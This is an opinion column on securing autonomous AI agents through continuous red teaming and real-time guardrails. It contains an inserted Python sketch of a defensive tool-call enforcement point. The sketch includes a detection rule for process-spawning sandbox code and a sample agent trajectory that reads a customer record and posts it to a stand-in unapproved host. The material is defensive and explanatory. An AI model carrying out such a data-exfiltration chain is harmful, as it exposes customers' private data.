COMMENTARY: For decades, cybersecurity has rested on one assumption. Software behaves predictably. We define inputs, control execution paths, monitor outputs. Then we manage firewalls, endpoint detection, and access control lists. All of it depends on that predictability.
AI systems do not fail like traditional software. They are often poisoned during training, manipulated at runtime through prompt injection or jailbreaks, or quietly corrupted by unsafe environments. Without an adaptive, AI-native security approach, risk outpaces static controls, resulting in AI drift, unsafe outputs, and failures that appear only after harm takes place.
Agents further complicate this risk landscape. They execute code, call APIs, browse the web, and touch enterprises' most sensitive systems. One agent handling a routine workflow can hit a CRM, spin up a code execution sandbox, and pull from an external data source in seconds. It picks its own tools. It reasons about what to do next. No static security rule accounted for that. The risk surface is not just bigger than before. It’s a different entity entirely: dynamic, context-dependent, expanding with every new integration.
Point controls were built for a world that no longer exists
The instinct in most security organizations has been to reach for familiar tools. Scan the prompt. Harden the model. Monitor the API call. Unfortunately, traditional security tools leave organizations blind to how agents actually operate end-to-end. Evaluating actions in isolation leads to false positives, missed multi-step attacks, and limited visibility into why decisions were blocked.
An agent doesn't just receive an instruction and return a result. It reasons, selects tools, interacts with live environments, adapts to what it finds, and produces effects that compound across systems. Scanning a single prompt tells us nothing about what the agent decides to do three steps later when it hits an unexpected database schema. Watching one API call misses the chain of 10 that follows.
When an agent can move between a customer database, a code interpreter, and an external web service inside a single task, perimeter defenses cannot keep up. We have to secure the full lifecycle.
One-time assessments create a false sense of security
Too many teams treat agent security as a "test once, deploy forever" scenario. An agent that passes every safety benchmark in staging can behave very differently once it's connected to live databases, unfamiliar third-party servers, or other agents in production.
A one-time assessment captures risk at a single point in time. It says nothing about next week, after the integrations shift or the operating environment changes. Nor does it account for agents that can now evolve themselves by acquiring new skills.
New vulnerabilities surface constantly. Prompt injections. Tool-level exploits. Environment-based attacks. These demand continuous detection and response. Not a snapshot.
We need to make continuous red teaming, spanning hundreds of attack strategies across categories like prompt injection, tool manipulation, and environment exploitation, the new standard. Anything less leaves organizations exposed to risks that didn't exist on the day they ran their last assessment.
Only real-time defense counts
With autonomous agents, the damage lives in the gap between detection and response. By the time a log entry flags an unauthorized data transfer or a runaway sequence of API calls, the consequences may have already hit: Data exposed. Transactions executed. Trust broken.
Enterprises need real-time, stateful guardrails for every agent action. Every tool call evaluated before execution. Insecure or out-of-policy behavior flagged before impact. Stealthy multi-step attacks detected through context-aware analysis.
Security must sit at a centralized enforcement point between agents and everything they touch, with full observability into conversations, tool calls, decision trajectories, and token traces.
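As an added illustration (not code from the column or from Virtue AI), the Python sketch below shows a stateful enforcement point of the kind described above: each tool call is judged before it runs, the verdict depends on what the agent has already done in the session, and every decision is written to an audit record. The tool names, the egress allow-list and the sample trajectory are constructed assumptions.

```python
# Added example: a minimal stateful enforcement point between an agent and its tools.
# Every tool call is evaluated before execution, against per-call policy and against the
# session's trajectory so far; every decision is appended to an audit record.
from dataclasses import dataclass, field

SENSITIVE_TOOLS = {"crm.read_customer", "db.query"}     # assumption: tools that read customer data
EGRESS_TOOLS = {"web.post", "http.request"}              # assumption: tools that send data outward
ALLOWED_EGRESS_HOSTS = {"api.example-partner.internal"}  # constructed allow-list


@dataclass
class Session:
    agent_id: str
    touched_sensitive: bool = False          # state carried across steps of one task
    audit: list = field(default_factory=list)


@dataclass
class Decision:
    allow: bool
    reason: str


def evaluate_tool_call(session: Session, tool: str, args: dict) -> Decision:
    """Decide before the tool runs, remembering what the agent did earlier in the session."""
    code = args.get("code", "")
    if tool == "sandbox.exec" and any(k in code for k in ("os.system", "subprocess")):
        d = Decision(False, "sandbox code attempts to spawn a host process")
    elif (tool in EGRESS_TOOLS and session.touched_sensitive
          and args.get("host") not in ALLOWED_EGRESS_HOSTS):
        # Trajectory rule: the same egress call is fine on its own, but not after a sensitive read.
        d = Decision(False, "egress to unapproved host after sensitive data access")
    else:
        d = Decision(True, "within policy")
    if d.allow and tool in SENSITIVE_TOOLS:
        session.touched_sensitive = True
    session.audit.append({"agent": session.agent_id, "tool": tool,
                          "allow": d.allow, "reason": d.reason})
    return d


def run_trajectory(session: Session, calls) -> list:
    """Replay proposed tool calls through the enforcement point; stop at the first blocked step."""
    verdicts = []
    for tool, args in calls:
        d = evaluate_tool_call(session, tool, args)
        verdicts.append(d.allow)
        if not d.allow:
            break
    return verdicts


# Constructed trajectory: each call looks benign in isolation, but together they read a
# customer record, reformat it in the sandbox, and post it to an unapproved host.
CONSTRUCTED_CALLS = [
    ("crm.read_customer", {"id": 42}),
    ("sandbox.exec", {"code": "summary = format_record(record)"}),
    ("web.post", {"host": "unapproved-host.example", "body": "summary"}),
]
```

Evaluating the third call alone would pass it; only the session state makes the chain visible, which is the gap the column describes between per-call scanning and lifecycle control.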
Moving from reactive monitoring to proactive control is not optional. It's the defining requirement of securing autonomous AI at enterprise scale.
Enterprises cannot treat agent security as a point solution or a one-time control. They need the ability to test, monitor, and control agents throughout their entire lifecycle. Pre-deployment red teaming. Continuous MCP analysis. Real-time enforcement and governance in production. Security must follow the agent wherever it operates.
That requires visibility, traceability, and accountability for every agentic framework. Visibility into conversations, actions, tool calls, and decision trajectories. Traceability across every step of reasoning and execution. Accountability enforced through centralized governance, role-based access control, and audit-ready records.
Autonomous systems demand continuous oversight. Enterprises that embed lifecycle security into their agent architecture will reduce risk. They will also move faster, deploy with confidence, and maintain control as AI becomes core to their operations.
Bo Li, chief executive officer, Virtue AI

SC Media Perspectives columns are written by a trusted community of SC Media cybersecurity subject matter experts. Each contribution has a goal of bringing a unique voice to important cybersecurity topics. Content strives to be of the highest quality, objective and non-commercial.